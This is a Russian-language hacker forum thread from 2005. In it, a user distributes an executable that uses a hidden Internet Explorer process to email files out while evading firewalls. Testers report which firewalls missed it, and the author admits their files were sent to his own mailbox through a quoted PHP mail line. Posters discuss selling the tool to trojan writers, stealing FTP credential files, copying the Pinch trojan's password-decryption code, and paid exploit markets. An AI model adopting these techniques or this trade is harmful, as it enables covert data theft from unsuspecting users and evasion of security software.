| Вопрос: Demo AntiFireWall | Добавлено: 10.08.05 02:09 |
Автор вопроса:  HACKER
|
|
Beta 0.1
описание: Подобно пинчу создаёт скрытый IE процесс. возможности: - отправка сообщения на мыло - 1 атач - текст примечания: 1) Должна палиться последними аутпостами и др. фаерами которые запрещают запуск скрытых IE процессов 2) IE в фаере должен быть полностью доверенным приложением Скачать: http://vb.hut1.ru/antifirewall.exe (~ 6 кб) В будущем технология чуть поменяется, IE будет запускатся как программа, как параметр будет передаватся URL, окно IE будет скрыто... думаю это позволит полностью избежать запаливание фаерами, но сильно снизит скорость. Тем кто протестит это просьба отписаться, и обязательно указать точную версию фаера! Отвечаю на лоха что с компа ничего не краду! на этом форуме я нехочу иметь врагов, да и вообще... Те кто меня знают много врмени думаю бояться не будут. Вообщем гарантирую что прога не несёт ничего плохого, или я не HACKER! (админам просьба топ не удалять, я ж сырсов не выкладываю, а тема всегда интерестна к обсуждению) |
| Ответы | Всего ответов: 57 |
|
Номер ответа: 1 Автор ответа:  HACKER Разработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #1 | Добавлено: 10.08.05 02:12 |
| тестировано на AtGuard 3.2 - не палется! | ||
|
Номер ответа: 2 Автор ответа: Progos ICQ: 311715784 Вопросов: 39 Ответов: 157 |
Web-сайт: Профиль | | #2 | Добавлено: 10.08.05 06:45 |
| Мой Аутпост просто выдал окно, что компоненты IE изменились, однако до почтового ящика письмо не дошло, видно смог заблокировать.(Outpost Firewall Pro ver. 2.5.370.4626 (370)) | ||
|
Номер ответа: 3 Автор ответа: TERMIT ICQ: 5297101 Вопросов: 16 Ответов: 93 |
Web-сайт: Профиль | | #3 | Добавлено: 10.08.05 07:29 |
|
Протестировал и получил результаты:
Послал файл с c:\windows\dsdxirmv.exe размером 116 КБ (118 784 байт) На мыло: termit@list.ru С текстом: lol Agnitum Outpost FireWall 2.1.292.3816 (307) Не пискнул ни слова прост ов тихаря показывал ну так для мониторингда что IE производит сетевую активность. Avast v 4.6 Home Edition Не пискнул не слова так же  . Я запустил как бы там есть различные службы ну стандартный экран и веб экран. Оба на полную катушку
Стоит Windows XP, SP2 Встроенный файр так же не пискнул ни слова )) Это все конечно радует...
Но письмо мне не пришло =(... Ни файла, ни самого письма =((( |
||
|
Номер ответа: 4 Автор ответа: gvozdРазработчик Offline Client Вопросов: 164 Ответов: 1317 
|
Web-сайт: Профиль | | #4 | Добавлено: 10.08.05 09:40 |
| Outpost Firewall Pro ver. 2.7.485.5401 (412) промолчал, но и письмо не пришло. | ||
|
Номер ответа: 5 Автор ответа: astoroICQ: 649109 Вопросов: 31 Ответов: 391 |
Профиль | | #5 | Добавлено: 10.08.05 12:15 |
|
Zone Alarm Pro 5.5.62.11 не пискнул
письмо не пришло |
||
|
Номер ответа: 6 Автор ответа: astoroICQ: 649109 Вопросов: 31 Ответов: 391 |
Профиль | | #6 | Добавлено: 10.08.05 12:18 |
| А теперь попробуйте без фаервола... | ||
|
Номер ответа: 7 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #7 | Добавлено: 10.08.05 16:35 |
|
При успешной отправке должно выскочить сообщение "Всё закончилось..." Больше атачи долговато кодируются, при этом может возникнуть подозрение что прога висит, на самом деле там медленный алгоритм кодирования файла в строку. Задержка на прибытие мыла в ящик может составлять несколько минут, т.к. пхп скрипт который декодирует файл работает ещё медление чем в ВБ... Попробуйте протестировать на небольших атачах < 50 кб
2 ALL !!!!!!!!!!!! Я забыл сточку поправить $result = XMail("rusya@mail.ru", "rusya@mail.ru", "  emo AntFireWall", $mess, $file);
))))))))))) Вообщем все кто тестил, мыло успешно было доставлено на rusya@mail.ru, даже от термита который не пожелел прогу и намылил > 150 Кб )) всё лежит у меня в ящике!!! ПХП скрипт уже подправил, так что сейчас должно слать вам, прогу можно заново не качать, в ней я нечего не менял.
|
||
|
Номер ответа: 8 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #8 | Добавлено: 10.08.05 16:46 |
|
Подвожу итоги:
AtGuard 3.2 - не палется! Outpost Firewall Pro ver. 2.7.485.5401 (412) - не палется! Zone Alarm Pro 5.5.62.11 - не палется! тестим дальше....! в прочем как я понял все фаеры кроме последнего Outpost будут отдыхать а чуть позже и он тоже Никакие SP for XP не помогают... Вообщем это прорыв!
|
||
|
Номер ответа: 9 Автор ответа: TERMITICQ: 5297101 Вопросов: 16 Ответов: 93 |
Web-сайт: Профиль | | #9 | Добавлено: 10.08.05 21:17 |
|
ЕТО ВСЕ ЕСТЬ ГУД ... а я дождался короче пока он напишет все кончилось. т.к. я знал же до этого что пока он отошлет время пройдет
|
||
|
Номер ответа: 10 Автор ответа: sneРазработчик Offline Client ICQ: 233286456 Вопросов: 34 Ответов: 5445 |
Web-сайт: Профиль | | #10 | Добавлено: 10.08.05 21:59 |
|
2Хакер, еще раз те говорю что у мня это дело присекается и
Outpost Firewall Pro ver. 2.7.492.5421 (4196) благим матом орет на весь экран что скрытый процесс пытается че-то мне намутить. ЗЫ 2Хакер, нехорошо присваивать чужое, не подобно а скопировано с сорцов пинча 
на этом форуме я нехочу иметь врагов, да и вообще
А ты их завел уже на других ?
(админам просьба топ не удалять, я ж сырсов не выкладываю, а тема всегда интерестна к обсуждению)
Интерес обычно представляют исходники
|
||
|
Номер ответа: 11 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #11 | Добавлено: 10.08.05 22:13 |
|
вообщем когда шнягу до ума доведу она будет ввиде dll оформлена, так шо всем троянописателям предлагаю за 3 пива... (3 WMZ) сырсы не дам )) на халяву тоже немогу, торчу за эту муть пиво sne, и сам хочу пива да и нехотелось бы чтоб любой вб программер состряпывал черви которые будут нужные файлы им на мыло слать, а у меня фаер спать при это будем. Вообщем чё я хочу сказать, я не сторонник того чтобы разводить ламеров которые будут писать всевозможные трои... ещё нехватало дать им в руки шапку невидимку от фаеров... Те кто в танках и так знают что к чему и как да зачем... нам и с ними не скучно, ибо червей развелось каспер токо и успевает ловить, нехотелось бы ко всему в этом деле видеть всяких разных которые созрели чтобы подключить dll и с помощью неё вымылить что-то типа wcx_ftp.ini и прочие файлы... Вообщем неподумайте что я та гнида которая разводит "плохих" людей.
|
||
|
Номер ответа: 12 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #12 | Добавлено: 10.08.05 22:17 |
| 2 sne В будущем запускать скрытый не будем, будем запускать нормальный и скрывать окно. Никто матом крыть небудет, да и разработка будет полностью моя. А на счёт последних аутпостов мы ж ещё тогда выяснили... | ||
|
Номер ответа: 13 Автор ответа: DaSharmICQ: 780477 Вопросов: 72 Ответов: 1297 |
Web-сайт: Профиль | | #13 | Добавлено: 10.08.05 22:52 |
|
HACKER, поздравляю с прорывом. Смена подрастает блин.... Но вот я тебя уверяю - если ты будешь думать, что ты круче всех - далеко не заедешь. Когда ты прорываешься в андеграунд - ставки резко изменяються, узнаешь новых людей, совсем новых, которые делают такие вещи совсем не для развлечений и не для пива. За подобные трояны, которые фаерволом не запалить платят по 500$. Очень хорошо платят за новые експлоиты и прочую дрянь, которая приносит очень большие деньги потом. Я познакомился с такими программерами, что мне стыдно даже что-то доказывать перед ними. Они фаерволы научились обходить на раз-два за 10 минут (said например, админ sockets.ru, прочти его статьи в журнале от mazafaka.ru, он очень крут), но они не трубят об этом на пол инета, а зарабатывают хорошие деньги (не 3 и не 30 WMZ за продажу). Ты Америку не открыл, и в лучшем случае (если разрекламишь готовый троян, не длл) ты просто испортишь немного бизнес крутым людям.
2sne: ох не думаю, что хакер рисовал от пинча что-то, в пинче все на крутом уровне , СОМ там...HACKER COM не юзал, думаю....Он просто как-то прилепил что-то к ИЕ... Аутпост скрытый ИЕ видит. И, вообще-то, мой старенький FireFucker (система обхода фаерволов) построена на похожем принципе, но там было задействовано внедрение, а новый аутпост даже перезапись участка памяти процеса увидит. Но есть способы обойти аутпост, очень простые кстати, все в журналах от mazafaka.ru
|
||
|
Номер ответа: 14 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #14 | Добавлено: 11.08.05 01:50 |
|
aSharm ты не прав, в этом примере чистое юзание СОМ, за что я sne и торчу пиво )) он же с того же пинча зная асм передрал на вб, ничего не скрывая, всё понятно как белый день... твоя FireFucker из-за внедрения в IE палется всеми кому не лень. Я завтра Beta 0.2 выложу, она 100% не кем не палется, там чисто html + js + php никаких извращений через COM или внедрение, просто открытие через shell такую страничку которая при помощи ещё пару скриптиков на серваке, ой, молчу... Вообщем посмотрите, это будет чисто моя технология, не пинч не sne не причём, хотя пиво как по обещал, с первой продажей отдам в wmz экиваленте Я тут ещё с одним "хакером" пообщался, он тоже заломил от 100$ до 700$ (в эти приделы тунул DaSharm)... я от теперь и думаю стоит ли за пиво хрень толкать... Просто смешно "это" продавать больше чем за пиво, я отвечаю, там мусора ну строчек 50, ключевых 2-3 ну + пхп, да js пригодился (я про Beta 0.2), вообщем незнаю. Мне эта шняга довольно легко далась, ну не за 10 минут, ну за несколько дней с моим то уровнем (если даже я смог за несколько дней) разве хрень такая может стоить стоко денег? ))
|
||
|
Номер ответа: 15 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #15 | Добавлено: 11.08.05 01:58 |
|
П.С. я с пинча2 давно алгоритмы разшифровки пасов срисовую кое что получается кое что нет, но ты же
ох не думаю, что хакер рисовал от пинча что-то, в пинче все на крутом уровне
, просто обижаешь Крутой хакер, думаешь неподружится с крутыми сырсами пинча на крутом уровне? )))))))
|
||